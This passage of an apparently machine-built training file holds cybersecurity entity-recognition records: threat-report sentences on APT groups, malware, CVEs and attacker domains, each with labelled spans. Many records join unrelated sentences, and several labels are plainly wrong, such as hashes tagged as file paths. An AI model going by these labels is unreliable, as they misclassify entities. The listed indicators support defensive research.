293]], "MALWARE: public IRC chats": [[298, 314]]}, "info": {"id": "cyberner_stix_train_007521", "source": "cyberner_stix_train"}} {"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system . 
Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain .", "spans": {"THREAT_ACTOR: Gallmaker": [[36, 45]], "TOOL: DDE protocol": [[70, 82]], "ORGANIZATION: TRAC": [[216, 220]]}, "info": {"id": "cyberner_stix_train_007522", "source": "cyberner_stix_train"}} {"text": "BLU Products has now updated its phones to remove the spying code , which most likely would have never been detected by regular users . The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Daserf : e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51 .", "spans": {"ORGANIZATION: BLU": [[0, 3]], "THREAT_ACTOR: attackers": [[140, 149]], "TOOL: 1.bat": [[242, 247]], "MALWARE: Daserf": [[349, 355]], "FILEPATH: e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51": [[358, 422]]}, "info": {"id": "cyberner_stix_train_007523", "source": "cyberner_stix_train"}} {"text": "Victims ’ first encounter with the malware reportedly comes via an unsolicited text message that their Android smartphone receives . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . a callback for decompiler events was implemented . Most 51 are due to carelessness , negligence , or compromised credentials , but the potential impact is still present even in an unintentional scenario .", "spans": {"SYSTEM: Android smartphone": [[103, 121]], "THREAT_ACTOR: Gallmaker": [[133, 142]], "VULNERABILITY: compromised credentials": [[388, 411]]}, "info": {"id": "cyberner_stix_train_007524", "source": "cyberner_stix_train"}} {"text": "Once the event is triggered , it registers a timer . 
The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The sample analyzed is f589827c4cf94662544066b80bfda6ab from late August 2015 .", "spans": {"THREAT_ACTOR: Sofacy group": [[57, 69]], "VULNERABILITY: Flash exploits": [[113, 127]], "TOOL: Carberp": [[145, 152]], "TOOL: JHUHUGIT downloaders": [[159, 179]]}, "info": {"id": "cyberner_stix_train_007525", "source": "cyberner_stix_train"}} {"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"THREAT_ACTOR: attackers": [[14, 23]], "MALWARE: MS PowerPoint document": [[32, 54]], "VULNERABILITY: CVE-2014-6352": [[80, 93]], "ORGANIZATION: TAA": [[96, 99]], "ORGANIZATION: telecoms operator": [[130, 147]]}, "info": {"id": "cyberner_stix_train_007526", "source": "cyberner_stix_train"}} {"text": "However , the botnet operators can start distributing other malware , including ransomware , at any time warns Štefanko . Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group . We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": {"TOOL: LoJax": [[186, 191]], "THREAT_ACTOR: Sednit": [[220, 226]], "THREAT_ACTOR: Lazarus": [[246, 253]]}, "info": {"id": "cyberner_stix_train_007527", "source": "cyberner_stix_train"}} {"text": "Kaspersky also discovered an interesting piece of rare malware created by this threat actor ScarCruft . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . 
The earliest use of the exploit ITW we were able to identify and confirm is a sample e228045ef57fb8cc1226b62ada7eee9b dating back to October 2018 ( VirusTotal submission of 2018-10-29 ) with the RTF creation time 2018-10-23 .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: ScarCruft": [[92, 101]], "ORGANIZATION: Anomali": [[104, 111]], "FILEPATH: ITW": [[190, 193], [269, 272]], "VULNERABILITY: exploit": [[209, 216], [261, 268]], "VULNERABILITY: CVE-2018-0798": [[221, 234]], "FILEPATH: e228045ef57fb8cc1226b62ada7eee9b": [[322, 354]], "TOOL: VirusTotal": [[385, 395]], "TOOL: RTF": [[432, 435]]}, "info": {"id": "cyberner_stix_train_007528", "source": "cyberner_stix_train"}} {"text": "Lotus Blossom targeted the government , higher education , and high tech companies . In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "ORGANIZATION: government": [[27, 37]], "ORGANIZATION: higher education": [[40, 56]], "ORGANIZATION: high tech companies": [[63, 82]], "MALWARE: Infy": [[222, 226]]}, "info": {"id": "cyberner_stix_train_007529", "source": "cyberner_stix_train"}} {"text": "The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign .", "spans": {"TOOL: Bitly": [[33, 38]]}, "info": {"id": "cyberner_stix_train_007530", "source": "cyberner_stix_train"}} {"text": "HKCU\\Environment\\UserInitMprLogonScript to execute the netwf.bat file COM Object hijack of the following CLSID : {BCDE0395-E52F-467C-8E3D-C4579291692E} , the CLSID of the class MMDeviceEnumerator .", "spans": {"FILEPATH: netwf.bat": [[55, 64]], "TOOL: CLSID": [[105, 110], [158, 163]]}, "info": {"id": "cyberner_stix_train_007531", "source": "cyberner_stix_train"}} {"text": "In the exploit , the attacker embeds the FLV object directly in the ActionScript code , and plays the video using 
NetStream class .", "spans": {"TOOL: FLV": [[41, 44]], "TOOL: ActionScript": [[68, 80]]}, "info": {"id": "cyberner_stix_train_007532", "source": "cyberner_stix_train"}} {"text": "TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT .", "spans": {"THREAT_ACTOR: TA549": [[0, 5]], "MALWARE: PlugX": [[52, 57]], "MALWARE: NetTraveler": [[60, 71]], "MALWARE: ZeroT": [[78, 83]]}, "info": {"id": "cyberner_stix_train_007533", "source": "cyberner_stix_train"}} {"text": "This command can be used when the operators are aware of the presence of interesting files on the computer .", "spans": {}, "info": {"id": "cyberner_stix_train_007534", "source": "cyberner_stix_train"}} {"text": "PittyTiger could also use CVE-2014-1761 , which is more recent . Thrip seemed to be mainly interested in the operational side of the company .", "spans": {"THREAT_ACTOR: PittyTiger": [[0, 10]], "VULNERABILITY: CVE-2014-1761": [[26, 39]]}, "info": {"id": "cyberner_stix_train_007535", "source": "cyberner_stix_train"}} {"text": "On Android , an Intent is a software mechanism that allows users to coordinate the functions of different Activities to achieve a task . This attack used the crisis in Syria as a lure to deliver malware to its targets . Suspicious attachment name: The name of attachment SHIPPING_MX00034900_PL_INV_pdf.zip ends with pdf.zip . 
The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": {"SYSTEM: Android": [[3, 10]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[271, 305]], "FILEPATH: pdf.zip": [[316, 323]], "ORGANIZATION: listed on the leak site": [[410, 433]]}, "info": {"id": "cyberner_stix_train_007536", "source": "cyberner_stix_train"}} {"text": "The newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form .", "spans": {"MALWARE: SPLM": [[10, 14]], "ORGANIZATION: NATO": [[97, 101]]}, "info": {"id": "cyberner_stix_train_007537", "source": "cyberner_stix_train"}} {"text": "TYPE_VIEW_TEXT_CHANGED Represents the event of changing the text of an EditText . A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware . CopyPaste : digi-cert.org somtelnetworks.com geotrusts.com secureclientupdate.com digicertweb.com sport-pesa.org itaxkenya.com businessdailyafrica.net infotrak-research.com nairobiwired.com k-24tv.com . 
2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": {"THREAT_ACTOR: Jripbot": [[150, 157]], "THREAT_ACTOR: Morpho": [[166, 172]], "ORGANIZATION: high profile companies": [[225, 247]], "THREAT_ACTOR: CopyPaste": [[347, 356]], "DOMAIN: digi-cert.org": [[359, 372]], "DOMAIN: somtelnetworks.com": [[373, 391]], "DOMAIN: geotrusts.com": [[392, 405]], "DOMAIN: secureclientupdate.com": [[406, 428]], "DOMAIN: digicertweb.com": [[429, 444]], "DOMAIN: sport-pesa.org": [[445, 459]], "DOMAIN: itaxkenya.com": [[460, 473]], "DOMAIN: businessdailyafrica.net": [[474, 497]], "DOMAIN: infotrak-research.com": [[498, 519]], "DOMAIN: nairobiwired.com": [[520, 536]], "DOMAIN: k-24tv.com": [[537, 547]], "ORGANIZATION: @SecurityAura": [[586, 599]]}, "info": {"id": "cyberner_stix_train_007538", "source": "cyberner_stix_train"}} {"text": "During the installation , the malware asks for the following permissions : READ_PHONE_STATE - Allows read-only access to the phone state , including the current cellular network information , the status of any ongoing calls , and a list of any PhoneAccounts registered on the device . A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . it 's not known if the attackers physically reside in Pakistan .", "spans": {"MALWARE: TONEDEAF": [[395, 403]], "THREAT_ACTOR: attackers": [[545, 554]]}, "info": {"id": "cyberner_stix_train_007539", "source": "cyberner_stix_train"}} {"text": "Figure 2 : “ Agent Smith ’ s jpg file structure After the extraction , the “ loader ” module adds the code to the application while using the legitimate mechanism by Android to handle large DEX files . 
Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network . Except for the installer , the other processes that run during execution are legitimate system processes . Enterprise T1082 System Information Discovery During the SolarWinds Compromise , APT29 used fsutil to check available free space before executing actions that might create large files on disk .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "SYSTEM: Android": [[166, 173]], "THREAT_ACTOR: Buhtrap": [[202, 209]], "ORGANIZATION: bank": [[279, 283]], "THREAT_ACTOR: the SolarWinds Compromise": [[558, 583]], "THREAT_ACTOR: APT29": [[586, 591]]}, "info": {"id": "cyberner_stix_train_007540", "source": "cyberner_stix_train"}} {"text": "Any app can ask for accessibility permissions and implement features such as screen reading , changing sizes and colors of objects , hearing enhancements , replacing touch with other forms of control and more . Once in their possession , the actors use these compromised payment card credentials to generate further card information . Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization .", "spans": {"THREAT_ACTOR: actors": [[242, 248]], "THREAT_ACTOR: OilRig group": [[403, 415]]}, "info": {"id": "cyberner_stix_train_007541", "source": "cyberner_stix_train"}} {"text": "If a victim enters their credentials , TG-4127 can establish a session with Google and access the victim's account .", "spans": {"THREAT_ACTOR: TG-4127": [[39, 46]], "ORGANIZATION: Google": [[76, 82]]}, "info": {"id": "cyberner_stix_train_007542", "source": "cyberner_stix_train"}} {"text": "When we first observed the malware in January , we recorded 380 infections . 
The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars . The filename will be cartoon.jpg or img.jpg or photo.jpg and the image usually depicts a cartoon . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"MALWARE: Seminar-Invitation.doc": [[117, 139]], "TOOL: Microsoft Word": [[163, 177]], "TOOL: ThreeDollars": [[199, 211]], "FILEPATH: cartoon.jpg": [[235, 246]], "FILEPATH: img.jpg": [[250, 257]], "FILEPATH: photo.jpg": [[261, 270]], "VULNERABILITY: CVE-2022 - 41080": [[326, 342]], "VULNERABILITY: CVE-2022 - 41040": [[417, 433]]}, "info": {"id": "cyberner_stix_train_007543", "source": "cyberner_stix_train"}} {"text": "The first observed samples of the Nemesis Gemina loader ( compiled on 14th December 2013 ) were used to load the updated MiniDuke backdoor , but by the spring of 2014 the Nemesis Gemina loader was also observed in use with CosmicDuke .", "spans": {"MALWARE: Nemesis Gemina loader": [[34, 55], [171, 192]], "MALWARE: MiniDuke backdoor": [[121, 138]], "MALWARE: CosmicDuke": [[223, 233]]}, "info": {"id": "cyberner_stix_train_007544", "source": "cyberner_stix_train"}} {"text": "ViceLeaker Operation : mobile espionage targeting Middle East 26 JUN 2019 In May 2018 , we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens . We continue to track the Wild Neutron group , which is still active as of June 2015 . As in Operation Daybreak , this actor performs sophisticated attacks using a zero-day exploit . 
Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": {"MALWARE: ViceLeaker": [[0, 10]], "SYSTEM: Android": [[140, 147]], "THREAT_ACTOR: Wild Neutron group": [[213, 231]], "MALWARE: zero-day": [[351, 359]], "ORGANIZATION: Malwarebytes 's": [[370, 385]], "MALWARE: NetSupport RAT": [[451, 465]]}, "info": {"id": "cyberner_stix_train_007545", "source": "cyberner_stix_train"}} {"text": "Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia .", "spans": {"THREAT_ACTOR: Sednit": [[22, 28]]}, "info": {"id": "cyberner_stix_train_007547", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT targets specific data types .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]]}, "info": {"id": "cyberner_stix_train_007548", "source": "cyberner_stix_train"}} {"text": "The backdoor checks for the existence of antivirus and firewall products before it initiates its malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_train_007549", "source": "cyberner_stix_train"}} {"text": "In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . 
Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability CVE-2017-11882 in Microsoft Office .", "spans": {"TOOL: publicly available tools": [[47, 71]], "TOOL: Mimikatz": [[84, 92]], "TOOL: Hacktool.Mimikatz": [[95, 112]], "VULNERABILITY: CVE-2016-0051": [[206, 219]], "VULNERABILITY: CVE-2017-11882": [[284, 298], [393, 407]], "THREAT_ACTOR: actors": [[333, 339]], "ORGANIZATION: Microsoft": [[411, 420]]}, "info": {"id": "cyberner_stix_train_007550", "source": "cyberner_stix_train"}} {"text": "Tweety Chat 's Android version can record audio , too . For now , we can call RTM one of the most active financial Trojans .", "spans": {"TOOL: Tweety Chat": [[0, 11]], "MALWARE: RTM": [[78, 81]], "ORGANIZATION: financial": [[105, 114]]}, "info": {"id": "cyberner_stix_train_007551", "source": "cyberner_stix_train"}} {"text": "The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . In one case in late 2014 , APT5 breached the network of an international telecommunications company .", "spans": {"VULNERABILITY: CVE-2016-4117": [[77, 90]], "ORGANIZATION: international telecommunications company": [[181, 221]]}, "info": {"id": "cyberner_stix_train_007552", "source": "cyberner_stix_train"}} {"text": "Figure 4 shows MyReceiver in action where it eventually calls the MainService service . The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak . 
The group primarily targets Japanese organizations , particularly those in government , biotechnology , electronics manufacturing , and industrial chemistry .", "spans": {"VULNERABILITY: vulnerability": [[107, 120]], "THREAT_ACTOR: Shadow Brokers": [[299, 313]], "ORGANIZATION: government": [[396, 406]]}, "info": {"id": "cyberner_stix_train_007553", "source": "cyberner_stix_train"}} {"text": "Following the MiniDuke expose , CosmicDuke in turn got its moment of fame when F-Secure published a whitepaper about it on 2nd July 2014 .", "spans": {"MALWARE: MiniDuke": [[14, 22]], "MALWARE: CosmicDuke": [[32, 42]], "ORGANIZATION: F-Secure": [[79, 87]]}, "info": {"id": "cyberner_stix_train_007554", "source": "cyberner_stix_train"}} {"text": "We were able to collect a second delivery document that shared the Joohn author from the crash list ( Lion Air Boeing 737 ).docx document , as well as the 188.241.58.170 C2 IP to host its remote template .", "spans": {"FILEPATH: crash list ( Lion Air Boeing 737 ).docx": [[89, 128]], "IP_ADDRESS: 188.241.58.170": [[155, 169]], "TOOL: C2": [[170, 172]]}, "info": {"id": "cyberner_stix_train_007555", "source": "cyberner_stix_train"}} {"text": "After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests .", "spans": {"THREAT_ACTOR: APT28": [[43, 48]]}, "info": {"id": "cyberner_stix_train_007556", "source": "cyberner_stix_train"}} {"text": "Vigilance Following Soleimani ’s Assassination : One of the lure documents mentions sources in Lebanon that report a state of alert and vigilance amongst Iranian , Syrian , and Lebasense militias following Soleimani ’s assassination .", "spans": {}, "info": {"id": "cyberner_stix_train_007557", "source": "cyberner_stix_train"}} {"text": "The “ Agent Smith ” campaign serves as a sharp reminder that effort from system developers alone is not enough to build a secure Android eco-system . 
According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 . However , there is a small difference between the domain used to send the email and the real one . Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023 - 37450 , a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use .", "spans": {"MALWARE: Agent Smith": [[6, 17]], "SYSTEM: Android": [[129, 136]], "TOOL: Corkow": [[176, 182]], "ORGANIZATION: users": [[201, 206]], "TOOL: email": [[430, 435]], "ORGANIZATION: Apple": [[455, 460]], "SYSTEM: iPhones": [[516, 523]], "SYSTEM: iPads": [[528, 533]], "VULNERABILITY: CVE-2023 - 37450": [[552, 568]], "SYSTEM: the WebKit browser": [[612, 630]], "TOOL: Safari": [[643, 649]], "SYSTEM: web browsers": [[660, 672]]}, "info": {"id": "cyberner_stix_train_007558", "source": "cyberner_stix_train"}} {"text": "What makes OnionDuke especially curious is an infection vector it began using during the summer of 2013 .", "spans": {"MALWARE: OnionDuke": [[11, 20]]}, "info": {"id": "cyberner_stix_train_007559", "source": "cyberner_stix_train"}} {"text": "This is what the spear phishing e-mail looked like : In regards to the message text above , multiple activist groups have recently organized a human rights conference event in Geneva . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . 
This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": {"TOOL: Tran Duy Linh": [[212, 225]], "VULNERABILITY: CVE-2012-0158": [[228, 241], [444, 457]], "FILEPATH: bait document": [[347, 360]], "TOOL: Word": [[410, 414]], "VULNERABILITY: exploit": [[458, 465]]}, "info": {"id": "cyberner_stix_train_007560", "source": "cyberner_stix_train"}} {"text": "The provider ’ s website described how the code 7494 can be used to provide a series of payment-related capabilities . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . Instead , the detection must be based on the behaviour on the operating system . For this reason it is important to note that some organizations and systems may simply be convenient targets which enable and facilitate attackers actions .", "spans": {"TOOL: Equation Editor": [[155, 170]], "MALWARE: EQNEDT32.EXE": [[173, 185]], "ORGANIZATION: organizations": [[413, 426]], "ORGANIZATION: systems": [[431, 438]]}, "info": {"id": "cyberner_stix_train_007561", "source": "cyberner_stix_train"}} {"text": "Other ransomware families use infinite loops of drawing non-system windows , but in between drawing and redrawing , it ’ s possible for users to go to settings and uninstall the offending app . This key was also used in the Honeybee campaign and appears to have been used since August 2017 . The command will instruct the code to execute only opaque predicates deobfuscation in the current selected function . 
No More Ransom now includes 185 partners from the public sector , private industry , law enforcement , and academia .", "spans": {"SYSTEM: windows": [[67, 74]]}, "info": {"id": "cyberner_stix_train_007562", "source": "cyberner_stix_train"}} {"text": "Over the past few years , Animal Farm has targeted a wide range of global organizations . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": {"THREAT_ACTOR: Animal Farm": [[26, 37]], "MALWARE: Carbanak": [[90, 98]]}, "info": {"id": "cyberner_stix_train_007563", "source": "cyberner_stix_train"}} {"text": "Barring authorized access to the victim ’s machine , the attacker would have to find some other means , such as crafting a new Flash exploit , to deliver a CVE-2015-1701 payload .", "spans": {"TOOL: Flash": [[127, 132]], "VULNERABILITY: CVE-2015-1701": [[156, 169]]}, "info": {"id": "cyberner_stix_train_007564", "source": "cyberner_stix_train"}} {"text": "One bulk card-checking tool this group uses is Testador Amazon.com v1.1 ( Figure 8 ) . 
Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"TOOL: bulk card-checking": [[4, 22]], "THREAT_ACTOR: group": [[33, 38]], "THREAT_ACTOR: Attackers": [[87, 96]], "TOOL: C&C": [[145, 148]], "ORGANIZATION: oil": [[281, 284]], "ORGANIZATION: gas": [[287, 290]], "ORGANIZATION: petrochemical companies": [[297, 320]], "ORGANIZATION: executives": [[350, 360]]}, "info": {"id": "cyberner_stix_train_007565", "source": "cyberner_stix_train"}} {"text": "However , it could easily be used for far more intrusive and harmful purposes such as banking credential theft . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality . Last year , Microsoft researchers described Neodymium ’s behavior as unusual : “ unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . 
TEMP.Veles has used port - protocol mismatches on ports such as 443 , 4444 , 8531 , and 50501 during C2 .", "spans": {"TOOL: Leader": [[113, 119]], "TOOL: Bookworm": [[123, 131]], "MALWARE: DLLs": [[227, 231]], "ORGANIZATION: Microsoft": [[280, 289]], "THREAT_ACTOR: Neodymium": [[312, 321]], "THREAT_ACTOR: PROMETHIUM": [[456, 466]], "THREAT_ACTOR: NEODYMIUM": [[471, 480]], "MALWARE: TEMP.Veles": [[565, 575]], "SYSTEM: C2": [[666, 668]]}, "info": {"id": "cyberner_stix_train_007566", "source": "cyberner_stix_train"}} {"text": "ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems . In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON .", "spans": {"TOOL: compromised websites": [[43, 63]], "THREAT_ACTOR: TEMP.Veles": [[264, 274], [353, 363]], "ORGANIZATION: FireEye": [[277, 284]], "MALWARE: TRITON": [[386, 392]]}, "info": {"id": "cyberner_stix_train_007567", "source": "cyberner_stix_train"}} {"text": "It requires attention and action from system developers , device manufacturers , app developers , and users , so that vulnerability fixes are patched , distributed , adopted and installed in time . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries . This spear-phishing message , written in Portuguese , has a malicious file attached misusing the name of a real attorney office , while the domain sender of the message was registered one day before , using a typo-squatting domain . 
However , users reported that the fix was causing Safari to not connect correctly to major websites like Facebook , Instagram and Zoom , leading Apple to pull back the patch .", "spans": {"TOOL: Corkow": [[223, 229]], "TOOL: Safari": [[615, 621]], "TOOL: Facebook": [[670, 678]], "TOOL: Instagram": [[681, 690]], "TOOL: Zoom": [[695, 699]], "ORGANIZATION: Apple": [[710, 715]]}, "info": {"id": "cyberner_stix_train_007568", "source": "cyberner_stix_train"}} {"text": "Both the redirect code on the compromised site and the exploit code appear and disappear , indicating that the adversaries add the code when they want to leverage the SWC and remove the code when it is not in use to limit the visibility of their operations .", "spans": {"SYSTEM: SWC": [[167, 170]]}, "info": {"id": "cyberner_stix_train_007569", "source": "cyberner_stix_train"}} {"text": "Pony is another loader with information stealing capabilities while Kegotip is an credential and email address harvesting malware strain that would appear in a small number of TA505 campaigns the following year as the primary payload .", "spans": {"MALWARE: Pony": [[0, 4]], "TOOL: loader": [[16, 22]], "MALWARE: Kegotip": [[68, 75]], "TOOL: email": [[97, 102]], "THREAT_ACTOR: TA505": [[176, 181]]}, "info": {"id": "cyberner_stix_train_007570", "source": "cyberner_stix_train"}} {"text": "Mobile users are called on to be on top of this news and be on guard for signs of monitoring . Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West . in MMAT_LOCOPT . 
Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"THREAT_ACTOR: Cobalt": [[138, 144]], "ORGANIZATION: Technologies information": [[174, 198]], "THREAT_ACTOR: group": [[312, 317]], "TOOL: MMAT_LOCOPT": [[363, 374]], "ORGANIZATION: threat researcher": [[396, 413]], "ORGANIZATION: CrowdStrike": [[425, 436]], "TOOL: MegaUpload": [[560, 570]], "TOOL: Twitter": [[581, 588]]}, "info": {"id": "cyberner_stix_train_007571", "source": "cyberner_stix_train"}} {"text": "The data exfiltrated by this threat actor , in conjunction with the TTPs and tools used , allowed us to determine with a very high probability that the threat actor behind these malicious operations is backed by a nation state , and is affiliated with China . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": {"THREAT_ACTOR: threat actor": [[29, 41], [152, 164]], "ORGANIZATION: political activist": [[349, 367]], "ORGANIZATION: British-Iranian": [[445, 460]]}, "info": {"id": "cyberner_stix_train_007572", "source": "cyberner_stix_train"}} {"text": "For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination . When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June . When network defenders see the communications between these backdoors and their C2 servers , they might easily dismiss them as legitimate network traffic . 
Think of cloud storage solutions like Dropbox or Plex , for example .", "spans": {"MALWARE: FrozenCell": [[32, 42]], "TOOL: Trojan": [[218, 224]], "ORGANIZATION: banks": [[302, 307]], "TOOL: C2": [[398, 400]], "TOOL: Dropbox": [[512, 519]], "TOOL: Plex": [[523, 527]]}, "info": {"id": "cyberner_stix_train_007573", "source": "cyberner_stix_train"}} {"text": "Project Spy uses the ongoing coronavirus pandemic as a lure , posing as an app called Coronavirus Updates . The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro . The original implementation supports the following two cases of flattened blocks to find a block comparison variable for the next block ( the cases are then simplified ) One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": {"MALWARE: Project Spy": [[0, 11]], "THREAT_ACTOR: threat group": [[215, 227]], "THREAT_ACTOR: Gamaredon": [[258, 267]], "ORGANIZATION: Symantec": [[280, 288]], "ORGANIZATION: Trend Micro": [[293, 304]], "THREAT_ACTOR: Hack520": [[506, 513]]}, "info": {"id": "cyberner_stix_train_007574", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT is a likely People's Republic of China ( PRC )-based targeted cyberespionage group that uses both proprietary and publicly available tools to target NGO networks .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "ORGANIZATION: People's Republic of China": [[29, 55]], "ORGANIZATION: PRC": [[58, 61]], "ORGANIZATION: NGO": [[166, 169]]}, "info": {"id": "cyberner_stix_train_007575", "source": "cyberner_stix_train"}} {"text": "Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates .", "spans": {}, "info": {"id": "cyberner_stix_train_007576", "source": "cyberner_stix_train"}} {"text": "The group 's 
primary goal is demonstrating to companies that they have weak security . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": {"ORGANIZATION: banking": [[181, 188]], "TOOL: emails": [[242, 248]], "ORGANIZATION: bank employees": [[276, 290]]}, "info": {"id": "cyberner_stix_train_007577", "source": "cyberner_stix_train"}} {"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . The first encounter with Buhtrap was registered back in 2014 .", "spans": {"MALWARE: Careto": [[59, 65]]}, "info": {"id": "cyberner_stix_train_007578", "source": "cyberner_stix_train"}} {"text": "After reentering an environment , the threat actors focus on obtaining the active directory contents .", "spans": {}, "info": {"id": "cyberner_stix_train_007579", "source": "cyberner_stix_train"}} {"text": "In our research we identified tens of fake applications that were infected with this malware . During one reported incident , APT38 caused an outage in the bank 's essential services . The optinsn_t : :f unc callback function is called in maturity levels from MMAT_ZERO ( microcode does not exist ) Viasat has said that “ tens of thousands of terminals have been damaged , made inoperable and can not be repaired . ”", "spans": {"THREAT_ACTOR: APT38": [[126, 131]], "ORGANIZATION: bank": [[156, 160]], "TOOL: optinsn_t : :f unc": [[189, 207]], "TOOL: MMAT_ZERO": [[260, 269]], "ORGANIZATION: Viasat": [[299, 305]]}, "info": {"id": "cyberner_stix_train_007580", "source": "cyberner_stix_train"}} {"text": "The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files . 
